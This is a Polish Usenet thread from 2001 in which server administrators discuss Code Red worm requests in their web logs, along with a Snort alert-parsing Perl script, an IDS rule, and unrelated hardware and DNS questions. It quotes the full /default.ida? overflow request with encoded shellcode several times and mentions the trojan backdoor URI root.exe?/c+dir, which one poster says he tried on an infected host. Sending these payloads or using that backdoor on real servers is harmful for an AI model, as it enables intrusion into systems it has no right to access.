W logach mam cos takiego :
ool-18bd5c1f.dyn.optonline.net - - [01/Aug/2001:18:29:01 +0200] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u
7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7
801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 400 319
oczywiscie w jednej linijce...
Czyzby ktos szukal dziury w serwerze www?
Ja mam Apache 1.3.20, wiec pewnie nie zadzialalo, ale ciekawe czy dziala na
IIS4/5 ?
Jak ktos cos wie to niech sie wypowie :)
W logach mam cos takiego :
ool-18bd5c1f.dyn.optonline.net - - [01/Aug/2001:18:29:01 +0200] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
oczywiscie w jednej linijce...
Czyzby ktos szukal dziury w serwerze www?
Ja mam Apache 1.3.20, wiec pewnie nie zadzialalo, ale ciekawe czy dziala
na
IIS4/5 ?
Jak ktos cos wie to niech sie wypowie :)
W ciagu ostatnich dwóch dni przybywa mi co najmniej jeden taki wpis na
godzine. Za kazdym razem spod innego adresu (nie wiem, czy próby sa
powtarzane spod jednego adresu kilka razy, bo konsekwetnie wszystkie
zarejestrowane IP dopisuje do reguly REJECT).
Pear
W logach mam cos takiego :
ool-18bd5c1f.dyn.optonline.net - - [01/Aug/2001:18:29:01 +0200] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
oczywiscie w jednej linijce...
Czyzby ktos szukal dziury w serwerze www?
Ja mam Apache 1.3.20, wiec pewnie nie zadzialalo, ale ciekawe czy dziala
na
IIS4/5 ?
Jak ktos cos wie to niech sie wypowie :)
--
pzdr.
## admin AWP.net http://awp.waw.pl
W logach mam cos takiego :
ool-18bd5c1f.dyn.optonline.net - - [01/Aug/2001:18:29:01 +0200] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
| ool-18bd5c1f.dyn.optonline.net - - [01/Aug/2001:18:29:01 +0200] "GET
| /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
W ciagu ostatnich 2 tygodni na tej grupie bylo kilka postow na ten temat -
znajdz je a dowiesz sie wszystkiego.
Poncki
W logach mam cos takiego :
ool-18bd5c1f.dyn.optonline.net - - [01/Aug/2001:18:29:01 +0200] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u
7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7
801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 400 319
oczywiscie w jednej linijce...
Czyzby ktos szukal dziury w serwerze www?
Ja mam Apache 1.3.20, wiec pewnie nie zadzialalo, ale ciekawe czy dziala na
IIS4/5 ?
Jak ktos cos wie to niech sie wypowie :)
pa90.warszawa.sdi.tpnet.pl - - [04/Aug/2001:21:53:13 +0200] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u90
90%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 404 920
pe129.lublin.sdi.tpnet.pl - - [04/Aug/2001:20:28:22 +0200] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u909
0%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 404 920
pb238.suwalki.sdi.tpnet.pl - - [04/Aug/2001:18:43:09 +0200] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u90
90%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 404 920
Nowy Code Red instaluje tez na zarazonym hoscie trojana, do ktorego
mozna sie odwolywac przez URI:
http://217.96.XXX.XXX/c/inetpub/scripts/root.exe?/c+dir
Sprawdzilem, dziala.
Wyglada na to, ze autorzy wirusow znalezli nowe atrakcyjne srodowisko
i sa na etapie wyscigu technologicznego pt. ,,czyj wirus lepszy''. Niedlugo
pewnie zaczna sie pojawiac znane z czasow DOSa usprawnienia w rodzaju
wirusow polimorficznych, generatorow wirusow, skuteczniejsze ukrywanie
w systemie itp.
Ciekawe, ktory z kolejnych Code Red zacznie wysylac na newsy przypadkowe
pliki .doc znalezione na serwerze? ;)
BTW jesli korzystacie ze Snorta (www.snort.org) to warto uruchamiac
wysylajac do Securityfocus adresy IP zarazonych hostow. Oni automatycznie
wysylaja do nich powiadomienia o infekcji - do wczoraj wyslali ok. 400
tys. Ponizej moje skrypty:
============ crontab =========
============ crontab =========
============ snort_ida.pl ====
#!/usr/bin/perl
open AL, "/var/log/snort/alert" || die "Cannot open: $!";
while(<AL)
{
/IDS552/ && do { $iis = 1; };
/(\d+)\/(\d+)-(\d+:\d+:\d+)\.\d+\s(\d+\.\d+\.\d+\.\d+)/ && do {
if($iis == 1) {
$month=$1; $day=$2; $time=$3; $ip=$4; $iis = 0;
print "$ip 2001-$month-$day $time\n";
}
};
Ten skrypt zaklada, ze Snort korzysta z regulek Vision
(www.whitehats.com/ids/), konkretnie ta regulka ma postac:
============ vision.rules ====
alert TCP $EXTERNAL any -$INTERNAL 80 (msg: "IDS552/web-iis_IIS ISAPI Overflow ida"; dsize: 239; flags: A+; uricontent: ".ida?"; classtype: system-or-info-attempt; reference: arachnids,552;)
============ vision.rules ====
W około 40% te adresy pokrywają się z tymi, spod których wcześniej już
zarejestrowałem próby skanowania otwartych portów. I po to dopisuję, że być
może jest to więcej niż te 40% (poza tym zawsze można to przecież usunąć za
jakiś czas).
Od tego weekendu przestałem już w ogóle zwracać uwagi na te wpisy w logach.
W tej chwili jest ich więcej niż odwiedzin :-)))))))).
Pear
Poncki
Na liscie Cypherpunks natomiast pojawil sie bardzo ciekawy pomysl (i
prototypowa implementacja) wirusa, ktory rozmnaza sie tak samo jak CR2,
ale po infekcji sciaga i instaluje hotfix na zarazony serwer. Podejrzewam
ze jest to jedyna skuteczna metoda zakonczenia fali Code Red na tysiacach
serwerow, ktorych administratorzy uwierzyli w Zero Administration w
Windows ;)
Poncki
Poncki
Nie mam IIS (jak również wysoce stabilnych Windows :)))) ), tylko Apache (na
przeciętnym Linuksie), a ten jak na razie ma się dobrze po wszelkich
możliwych uzupełnieniach. Nie znalazłem natomiast jak do tej pory porządnego
FTP i niestety jak na razie jest zablokowany dla świata.
Poza tym nie narzekam. No chyba, że gdzieś jeszcze jestem "dziurawy", tylko
jeszcze o tym nie wiem.
Pear
PS. Intranetowy Windows NT wywalił się ostatnio z powodu ..... zbyt szybkiej
transmisji :)))) Podłączyłem go do sieci 100Base-TX i nie zdążył obsłużyć
wszystkich IRQ przychodzących od karty sieciowej (2 procesory PIII 733 MHz).
Poncki
ps. Mam nadzieję, że ten cały pomysł to niezbyt mądry dowcip. Serio.
ps2. Tak, nie czytam cypherpunks.
Czy ktos z was zauwazym od pewnego czasu ze po sieci nie chodza pakiety
ICMP ( PING ) ??? Z mojego serwera moge pingnac wezel POLPAKA ale poza
niegu juz nic nie idzie. Oczywiscie pozostale uslugi chodza ( www, ftp
,ssh ). Czy ktos moze wie co TPSA robi ????
<-=MERLIN=-
| PS. Intranetowy Windows NT wywalił się ostatnio z powodu ..... zbyt
szybkiej
| transmisji :)))) Podłączyłem go do sieci 100Base-TX i nie zdążył
obsłużyć
| wszystkich IRQ przychodzących od karty sieciowej (2 procesory PIII 733
MHz).
To akurat może przeszkadzać i Linuxowi, jeśli karta będzie wyjątkowo
lame (np. RTL-8139). W serwerach opłaca się używać dobrych kart,
np. Intel EtherExpress Pro/100 albo DEC Tulip.
Pear
Poncki
PS. Masz problem z references....
Ale akurat chyba 3COM 3c905 należy do tych lepszych, tak mi się
przynajmniej wydaje.
Poncki
Karta 3Com 3C905-TX z włączoną opcją minimalnego użycia procesora. To chyba
dobra karta ?
Pozdrawiam.
Poncki
Co to za wpisy w logach serwera Linux mandrake ?
Aug 16 12:52 linux named [417]: Lame server on 'jamisongold.com'
('jamisongold.COM' ?) [4.2.49.2].53 'DNSAUTH1.SYS.GTEI.NET'
Takich wpisow mam cale mnostwo - z roznych domen
Czy to blad w konfiguracji - czy proba ataku ?
Takich wpisow mam cale mnostwo - z roznych domen
Czy to blad w konfiguracji - czy proba ataku ?
Pzdrwm.
| Aug 16 12:52 linux named [417]: Lame server on 'jamisongold.com'
| ('jamisongold.COM' ?) [4.2.49.2].53 'DNSAUTH1.SYS.GTEI.NET'
| Takich wpisow mam cale mnostwo - z roznych domen
| Czy to blad w konfiguracji - czy proba ataku ?
Błąd w konfiguracji.
Czy mógłbym dowiedzieć się czegoś więcej. Jaki błąd i jak go usunąć?
Pozdrawiam,
Alek Oktawiec
|- Czy mógłbym dowiedzieć się czegoś więcej. Jaki błąd i jak go usunąć?
http://www.isc.org/products/BIND/
szukaj FAQ
newrom
Novell 4.11 + Pentium IV serwer - czy to dziala poprawnie ?
bezpieczenstwo serwera hostingowego - vide pair.com
Skromny serwer rackowy - co sądzicie o firmie Ideal ?
I Love You zaatakowal juz 350.000 komputerow za woda
switche edge-core'a z atela
Wolny PC-et
commander